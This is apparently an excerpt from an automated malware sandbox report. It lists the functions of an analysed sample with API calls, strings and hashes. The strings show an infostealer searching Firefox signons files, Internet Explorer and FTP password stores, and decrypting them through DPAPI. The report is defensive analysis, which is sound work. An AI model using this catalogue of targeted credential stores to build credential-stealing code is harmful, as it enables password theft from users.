                                                • Instruction Fuzzy Hash: DBF03670580104F9EF117BA1CC47FAD7E76DF10748F20417A7900741F1DAB99B91965C
                                                Function 00401EB1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                                                • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,00000105), ref: 00401EDC
                                                Strings
                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00401F11
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocFolderLocalPath
                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                • API String ID: 1254228173-2036018995
                                                • Opcode ID: c28ff4115be80b1519ab409ccd38de52fdf85428ec638eb9e2a82520366f4a1b
                                                • Instruction ID: 7738f67dd9614b2846b3a2efeb9c4eebaa8b985614ff96bd2da1bef5687651b4
                                                • Opcode Fuzzy Hash: c28ff4115be80b1519ab409ccd38de52fdf85428ec638eb9e2a82520366f4a1b
                                                • Instruction Fuzzy Hash: A8018436A0420AEBDB109F54CD02F9EB7A5EB44354F208177F501BB2E0E778DA50DB89
                                                Function 00407E69 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00407E8D
                                                  • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                                                  • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                                                  • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                                                  • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$DirectoryFreeLocalWindowslstrcatlstrcpy
                                                • String ID: \32BitFtp.ini
                                                • API String ID: 2776971706-1260517637
                                                • Opcode ID: 51947bd4a43856fb64459cddf9cfac3cfc739f25bbf2e381c647eedb7ed0305d
                                                • Instruction ID: cbf003877d027d6a197ada6978e58f7ea5a3bd39d8541963de42c9327f17cd29
                                                • Opcode Fuzzy Hash: 51947bd4a43856fb64459cddf9cfac3cfc739f25bbf2e381c647eedb7ed0305d
                                                • Instruction Fuzzy Hash: C3F08970A00108BAEB10BB61CC42FDE791D9B40344F104077B704B51E2DAB99F80969D
                                                Function 004024D6 Relevance: 3.0, APIs: 2, Instructions: 47libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(?), ref: 004024DF
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 0040250D
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID:
                                                • API String ID: 2574300362-0
                                                • Opcode ID: 6732e7a58c27bc06566346bb9b7272300466cfa088261deaf2f8ea774c68ea67
                                                • Instruction ID: fbc1fe3612a262e3ea9a0b223a66db08094d4ab5f536d4fd90f1adfdd8ad2806
                                                • Opcode Fuzzy Hash: 6732e7a58c27bc06566346bb9b7272300466cfa088261deaf2f8ea774c68ea67
                                                • Instruction Fuzzy Hash: 20F09A732051142ADB106A3AAC4499B6B88E7E33B8B105137E806A62C1E5B9DD8682A8
                                                Function 0040E566 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 30stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen
                                                • String ID: .xml
                                                • API String ID: 1659193697-2937849440
                                                • Opcode ID: 900e86652a8cbea142b181e7f38bd3d5cad69fdd162be18f53ab6bd13132232b
                                                • Instruction ID: d50f8ccee8f7243a6a0ed472ec34bd5e2a0a6362bf3d9178c3556d4465c1c39f
                                                • Opcode Fuzzy Hash: 900e86652a8cbea142b181e7f38bd3d5cad69fdd162be18f53ab6bd13132232b
                                                • Instruction Fuzzy Hash: 69F03A32900108FADF11BBD1CC42ECDBB76AB50308F208576B660B51B0D7B99BA4EB48
                                                Function 00401F36 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                Download Yara Rule
                                                APIs
                                                • ExitProcess.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00401F62
                                                • CloseHandle.KERNEL32(00000000,?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00401F6F
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseExitHandleProcess
                                                • String ID:
                                                • API String ID: 1046136549-0
                                                • Opcode ID: aae0be0bb2ecbd40ab9fe935455bc870e6245361f36fb792026b32c129e776f9
                                                • Instruction ID: ff3804100ddf8c199ee2f8612031d1c0044171ab4ec93654cd43e20a2e279d87
                                                • Opcode Fuzzy Hash: aae0be0bb2ecbd40ab9fe935455bc870e6245361f36fb792026b32c129e776f9
                                                • Instruction Fuzzy Hash: C6E04F7235024537EB3155699C83F46258857127A8F104032B345FD2D1DAE9E9D0425C
                                                Function 00401FB9 Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                                                Download Yara Rule
                                                APIs
                                                • ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000), ref: 00401FC6
                                                  • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                                                • ExpandEnvironmentStringsA.KERNEL32(?,?,00000000,00000000,?,00000000,00000000), ref: 00401FE1
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: EnvironmentExpandLocalStrings$AllocFree
                                                • String ID:
                                                • API String ID: 2376306162-0
                                                • Opcode ID: f12fd6f9597f56dc7ccf965001f0c4b7f47bfccdea30f1c07eb7795496cc88c6
                                                • Instruction ID: d8336d695edfc154b3b45a9711e618b47250add4b5adda8f5b079a4b1d77d4f2
                                                • Opcode Fuzzy Hash: f12fd6f9597f56dc7ccf965001f0c4b7f47bfccdea30f1c07eb7795496cc88c6
                                                • Instruction Fuzzy Hash: 1CE0ED7190410AFAEB10BAB59D02BAE7A69AB00358F20453A7504F51E1DBB99F60A668
                                                Function 004037C6 Relevance: 3.0, APIs: 2, Instructions: 22networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: gethostbynameinet_addr
                                                • String ID:
                                                • API String ID: 1594361348-0
                                                • Opcode ID: 714c08619f4502eaee032449eb1ef9973a266bd764f847276e968b64be4354d4
                                                • Instruction ID: 5e93a2d41fda1c27195ed80854e744a6a241ee01f30d7083f3dbc766825ad624
                                                • Opcode Fuzzy Hash: 714c08619f4502eaee032449eb1ef9973a266bd764f847276e968b64be4354d4
                                                • Instruction Fuzzy Hash: D5E04FB420440A9FCA11AE3DC8428557F987B163B93108333F130EB2F1D778D941A749
                                                Function 0041062F Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 0041062F
                                                • ExitProcess.KERNEL32(00000000), ref: 0041064D
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CountExitProcessTick
                                                • String ID:
                                                • API String ID: 232575682-0
                                                • Opcode ID: 03098564a4423b0794b70d1d0606a8fc149a8030d21a065d1568f8fca50770ea
                                                • Instruction ID: 1157fecdfa7adbe7534eede1c2d4befca9c0b9d0b40d7f3ba9e62a443b5a47ca
                                                • Opcode Fuzzy Hash: 03098564a4423b0794b70d1d0606a8fc149a8030d21a065d1568f8fca50770ea
                                                • Instruction Fuzzy Hash: 26C04C3075510454D79462A295567ED100347D5708F51801BA11A541868CDC0AF6151F
                                                Function 00401422 Relevance: 1.5, APIs: 1, Instructions: 28fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00401439
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileWrite
                                                • String ID:
                                                • API String ID: 3934441357-0
                                                • Opcode ID: 0abead393dd6c6aee7a413c553546d88cf46b493f200794402aa322d28499946
                                                • Instruction ID: ffb465389c342e6fff0e154865cbb03be69b4e2e252949391933a2331f5ccebc
                                                • Opcode Fuzzy Hash: 0abead393dd6c6aee7a413c553546d88cf46b493f200794402aa322d28499946
                                                • Instruction Fuzzy Hash: 71E06532510119ABCF10DE689C01FDF77A8DB50358F044126F914E61E0E7B5DF50C795
                                                Function 00410630 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 0041062F
                                                • ExitProcess.KERNEL32(00000000), ref: 0041064D
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CountExitProcessTick
                                                • String ID:
                                                • API String ID: 232575682-0
                                                • Opcode ID: 3645a7ea88c7323cbd8617e57a5ccdbe4c73d8c6c1bedb72e55e2349f61f393b
                                                • Instruction ID: 2fc71ade2e6a0a12d312a71b131b45268222faf8461f3848b8adab9be6287053
                                                • Opcode Fuzzy Hash: 3645a7ea88c7323cbd8617e57a5ccdbe4c73d8c6c1bedb72e55e2349f61f393b
                                                • Instruction Fuzzy Hash: 02C0123021D24099C34157618D6A7C635120B92304F1580AFD0084449399A909D2862F
                                                Function 00403FFB Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WSAStartup.WSOCK32(00000101,?), ref: 00404010
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Startup
                                                • String ID:
                                                • API String ID: 724789610-0
                                                • Opcode ID: c74a549251bf94bfbbbcfe40021cd955fca6604113e72adbbeb47ea308e6471e
                                                • Instruction ID: 067aa5936d8b9ea5f708c86def76a5f3d8c81cd5d66f0ce82ea66d37eb38fb46
                                                • Opcode Fuzzy Hash: c74a549251bf94bfbbbcfe40021cd955fca6604113e72adbbeb47ea308e6471e
                                                • Instruction Fuzzy Hash: BDB0923161460826EA10A2968C479D6729C4744748F4005A13A5AD12C3EBE5AAC046EA
                                                Function 00401011 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00401018
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateGlobalStream
                                                • String ID:
                                                • API String ID: 2244384528-0
                                                • Opcode ID: 3b7237234ab769e01ab04899e5e5932dde4cbbb511f78cf9168cf59f11837e65
                                                • Instruction ID: 6a52ffac9a52bb75e61fdc74f829c3bacd20c516bd36067e767411562a370432
                                                • Opcode Fuzzy Hash: 3b7237234ab769e01ab04899e5e5932dde4cbbb511f78cf9168cf59f11837e65
                                                • Instruction Fuzzy Hash: FFA0113228020030EA20AAA08803FC828020B20B8CF008002BB08280C0C0EA80E08A28
                                                Function 004018CF Relevance: 1.3, APIs: 1, Instructions: 9memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocLocal
                                                • String ID:
                                                • API String ID: 3494564517-0
                                                • Opcode ID: c3b6909c240290169a852e486617f39144794642c18f97d4acc290094f2c7c07
                                                • Instruction ID: a02c1daf7142050e978c307995f6bc26c6b3feeb3ea3d743e520ab0cb6cfa48f
                                                • Opcode Fuzzy Hash: c3b6909c240290169a852e486617f39144794642c18f97d4acc290094f2c7c07
                                                • Instruction Fuzzy Hash: 81B092B124030826E250A649C803F5A728C9B50B8CF008022BB45A6282C8A8F9A041AD
                                                Function 004018B8 Relevance: 1.3, APIs: 1, Instructions: 9COMMON
                                                Download Yara Rule
                                                APIs
                                                • LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeLocal
                                                • String ID:
                                                • API String ID: 2826327444-0
                                                • Opcode ID: 5069cc6e7fe4c10538abf4a01635c7b27162fc4643f47307ddecb10484670e1c
                                                • Instruction ID: 6f7800812ba96fbfdec46f28aef180318072ae253db4b629a7912724480db57a
                                                • Opcode Fuzzy Hash: 5069cc6e7fe4c10538abf4a01635c7b27162fc4643f47307ddecb10484670e1c
                                                • Instruction Fuzzy Hash: 64C09B7210050C55C7017E25C905B9A7AD8575034CF40C1356605555B5D6B8D6E4C5D8

                                                Non-executed Functions

                                                Function 00409832 Relevance: 31.7, APIs: 11, Strings: 7, Instructions: 169filestringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileA.KERNEL32(00000000,?), ref: 004098A2
                                                • lstrcmpiA.KERNEL32(00414F84,?), ref: 004098CF
                                                • lstrcmpiA.KERNEL32(00414F86,?), ref: 004098EC
                                                • FindNextFileA.KERNEL32(?,?,00000000,00000000,?,signons2.txt,00000000,?,signons.txt,?,?,signons.sqlite,00000000,?), ref: 00409A82
                                                • FindClose.KERNEL32(?,?,?,00000000,00000000,?,signons2.txt,00000000,?,signons.txt,?,?,signons.sqlite,00000000,?), ref: 00409A95
                                                  • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                                                  • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                                                  • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                                                  • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                                                • String ID: *.*$\*.*$prefs.js$signons.sqlite$signons.txt$signons2.txt$signons3.txt
                                                • API String ID: 3040542784-1405255088
                                                • Opcode ID: 116bc4e539c9a265e5d4d62613a74d4eeea999df68e4af365c8c572c7b60d30f
                                                • Instruction ID: 67051825bcad8824e2b937691ec5a4406eb7b4ce862c3ffcbd0e68b0dcec7392
                                                • Opcode Fuzzy Hash: 116bc4e539c9a265e5d4d62613a74d4eeea999df68e4af365c8c572c7b60d30f
                                                • Instruction Fuzzy Hash: A2513071941249BADF61BF61CC02EEE7A6AAF41308F1044BBB408711F2D6799ED0AE59
                                                Function 00402CE7 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 105COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: explorer.exe
                                                • API String ID: 0-3187896405
                                                • Opcode ID: 218728443306cc9d00ae8efdbf020c82e4af88c1d60a6babb47cb0d0ca7da1f5
                                                • Instruction ID: 6cf2bdf8de8470b1e15b5c95fcd56135633905720b215610431ce2b02da368ac
                                                • Opcode Fuzzy Hash: 218728443306cc9d00ae8efdbf020c82e4af88c1d60a6babb47cb0d0ca7da1f5
                                                • Instruction Fuzzy Hash: F0313930A40208AADF229B61CD49BEE7BB4AB44344F1044B7E105B11E1DBB99FD5DF99
                                                Function 0041032D Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 140COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 123456
                                                • API String ID: 0-158520161
                                                • Opcode ID: 9e2e08eb7098b4a3e74be6c44804e6ce63f5975dc39676ed667ad46d90c9c269
                                                • Instruction ID: 162fa20a4eef0904e001b52781486bdd0e96aabe3a3ff4935987bad036a14f5f
                                                • Opcode Fuzzy Hash: 9e2e08eb7098b4a3e74be6c44804e6ce63f5975dc39676ed667ad46d90c9c269
                                                • Instruction Fuzzy Hash: 59515C70904208EFEF119FA1DD86BEDBBB5EB04304F148066E610B91E1C7F99AD4DB29
                                                Function 0040A557 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 105stringencryptionCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040A2A9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A2E2
                                                  • Part of subcall function 0040A2A9: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A2EB
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A58B
                                                • lstrcmpiA.KERNEL32(?,Internet Explorer), ref: 0040A615
                                                • lstrcmpiA.KERNEL32(?,WininetCacheCredentials), ref: 0040A634
                                                • lstrcmpiA.KERNEL32(?,MS IE FTP Passwords), ref: 0040A653
                                                • StrStrIA.SHLWAPI(?,DPAPI: ,?,Internet Explorer), ref: 0040A66C
                                                • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040A6B2
                                                • LocalFree.KERNEL32(?), ref: 0040A6DF
                                                • CoTaskMemFree.OLE32(00000000,?,DPAPI: ,?,Internet Explorer), ref: 0040A709
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Freelstrcmpi$ByteCharMultiTaskWide$CryptDataLocalUnprotect
                                                • String ID: DPAPI: $Internet Explorer$MS IE FTP Passwords$WininetCacheCredentials
                                                • API String ID: 2957877119-3076635702
                                                • Opcode ID: 316b5cd246f5946664c4fd6bc4d269ab0d69fb1bc722cfdc9a0684b5eae608d5
                                                • Instruction ID: d2a922008bdebd86f42a8708ca9441522aabe83a0fc08158bea3eb6d75d48dad
                                                • Opcode Fuzzy Hash: 316b5cd246f5946664c4fd6bc4d269ab0d69fb1bc722cfdc9a0684b5eae608d5
                                                • Instruction Fuzzy Hash: A741187190021CEADF219E50CC42FDABAB9BF08304F04C0A6F644750D0DBB69AE59FD9
                                                Function 0040BC36 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 140stringencryptionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040BCED
                                                • LocalFree.KERNEL32(00000000,?), ref: 0040BD28
                                                • lstrlen.KERNEL32(ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BD69
                                                • StrCmpNIA.SHLWAPI(?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BD77
                                                • lstrlen.KERNEL32(http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BD85
                                                • StrCmpNIA.SHLWAPI(?,http://,00000000,http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BD93
                                                • lstrlen.KERNEL32(https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BDA1
                                                • StrCmpNIA.SHLWAPI(?,https://,00000000,https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BDAF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
